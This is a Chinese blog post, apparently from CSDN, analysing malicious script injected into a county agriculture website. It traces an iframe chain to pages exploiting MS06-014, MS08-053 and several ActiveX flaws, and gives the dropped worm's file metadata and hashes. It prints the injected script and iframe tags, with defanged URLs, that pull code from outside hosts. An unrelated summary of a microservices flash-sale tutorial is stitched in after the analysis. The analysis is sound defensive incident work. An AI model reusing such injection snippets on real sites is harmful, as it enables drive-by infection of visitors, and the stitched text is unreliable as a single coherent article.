某县农业信息网挂马 Worm.Win32.AutoRun.umf

本文分析了一个县农业信息网站遭遇的Worm.Win32.AutoRun.umf挂马事件,详细介绍了恶意代码通过多个漏洞进行传播的过程及所下载恶意文件的特征。

某县农业信息网挂马 Worm.Win32.AutoRun.umf

网站首页包含代码:
/---
<script src=hxxp://w**.9*4sa**om*m*.com/js.js></script>
---/


#1 hxxp://w**.9*4sa**om*m*.com/js.js
输出代码:
/---
<iframe src=hxxp://w**.c**6*6f**.cn/swf.htm width=100 height=0></iframe>
---/

#1.1 hxxp://w**.c**6*6f**.cn/swf.htm

检测浏览器类型,如果是IE内核,则此显示ie.swf,否则显示ff.swf,并输出代码:
/---
<iframe src=x.htm width=60 height=0></iframe>
---/

#1.1.1 hxxp://w**.c**6*6f**.cn/ie.swf

#1.1.2 hxxp://w**.c**6*6f**.cn/ff.swf

#1.1.3 hxxp://w**.c**6*6f**.cn/x.htm
引入以下网页:

#1.1.3.1 hxxp://w**.c**6*6f**.cn/1.htm

利用ms-06014漏洞下载 hxxp://d**.w**uc**7*.com/xx.exe

文件说明符 : d:/test/d**.w**uc**7*.com
属性 : A---
数字签名:否
PE文件:是
语言 : 中文(中国)
文件版本 : 5.1.2600.2696 (xpsp_sp2_gdr.050610-1519)
说明 : Spooler SubSystem App
版权 : ?MicRoSoFt Corporation. All rights reserved.
产品版本 : 5.1.2600.2696
产品名称 : MicrOSoFt?Windows?Operating System
公司名称 : Microsoft Corporation
内部名称 : spoo1sv.exe
源文件名 : spoo1sv.exe
创建时间 : 2008-12-15 12:33:22
修改时间 : 2008-12-15 12:33:24
大小 : 13312 字节 13.0 KB
MD5 : bffd930ac3d96e4e21b0d26d8cad02c3
SHA1: 97F2F1CF425FEEEB22833FB44549BBD74E23927D
CRC32: 43af59c4

卡巴斯基报为:Worm.Win32.AutoRun.umf[KLAN-18444490],瑞星报为:Worm.Win32.DownLoad.lz(http://bbs.ikaka.com/showtopic-8574655.aspx

#1.1.3.2 hxxp://w**.c**6*6f**.cn/0.htm

利用MS08-053(Windows Media Encoder wmex.dll ActiveX BOF Exploit,clsid:A8D3AD02-7508-4004-B2E9-AD33F087F43C)漏洞

#1.1.3.3 hxxp://w**.c**6*6f**.cn/newlz.htm
利用联众软件(GLIEDown.IEDown.1)漏洞

#1.1.3.4 hxxp://w**.c**6*6f**.cn/s.htm
利用新浪DLoader Class ActiveX控件(Downloader.DLoader.1)漏洞

#1.1.3.5 hxxp://w**.c**6*6f**.cn/office.htm
利用MS08-041(snpvw.Snapshot Viewer Control.1)漏洞


#1.1.3.6 hxxp://w**.c**6*6f**.cn/2.htm

利用联众世界GLWorld ((HanGamePluginCn18.HanGamePluginCn18.1)漏洞

#1.1.3.7 hxxp://w**.c**6*6f**.cn/3.htm
当(IERPCtl.IERPCtl.1)版本小于或等于6.0.14.552时利用RealPlayer漏洞

#1.1.3.8 hxxp://w**.c**6*6f**.cn/4.htm
当(IERPCtl.IERPCtl.1)版本大于6.0.14.552时利用RealPlayer漏洞

#1.1.3.9 hxxp://w**.c**6*6f**.cn/5.htm
利用IE7漏洞

#1.1.3.10 hxxp://w**.c**6*6f**.cn/uu.htm
利用UUSee(clsid:2CACD7BB-1C59-4BBB-8E81-6E83F82C813B)漏洞

内容概要:本文详细介绍了“秒杀商城”微服务架构的设计与实战全过程,涵盖系统从需求分析、服务拆分、技术选型到核心功能开发、分布式事务处理、容器化部署及监控链路追踪的完整流程。重点解决了高并发场景下的超卖问题,采用Redis预减库存、消息队列削峰、数据库乐观锁等手段保障数据一致性,并通过Nacos实现服务注册发现与配置管理,利用Seata处理跨服务分布式事务,结合RabbitMQ实现异步下单,提升系统吞吐能力。同时,项目支持Docker Compose快速部署和Kubernetes生产级编排,集成Sleuth+Zipkin链路追踪与Prometheus+Grafana监控体系,构建可观测性强的微服务系统。; 适合人群:具备Java基础和Spring Boot开发经验,熟悉微服务基本概念的中高级研发人员,尤其是希望深入理解高并发系统设计、分布式事务、服务治理等核心技术的开发者;适合工作2-5年、有志于转型微服务或提升架构能力的工程师; 使用场景及目标:①学习如何基于Spring Cloud Alibaba构建完整的微服务项目;②掌握秒杀场景下高并发、超卖控制、异步化、削峰填谷等关键技术方案;③实践分布式事务(Seata)、服务熔断降级、链路追踪、统一配置中心等企业级中间件的应用;④完成从本地开发到容器化部署的全流程落地; 阅读建议:建议按照文档提供的七个阶段循序渐进地动手实践,重点关注秒杀流程设计、服务间通信机制、分布式事务实现和系统性能优化部分,结合代码调试与监控工具深入理解各组件协作原理,真正掌握高并发微服务系统的构建能力。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值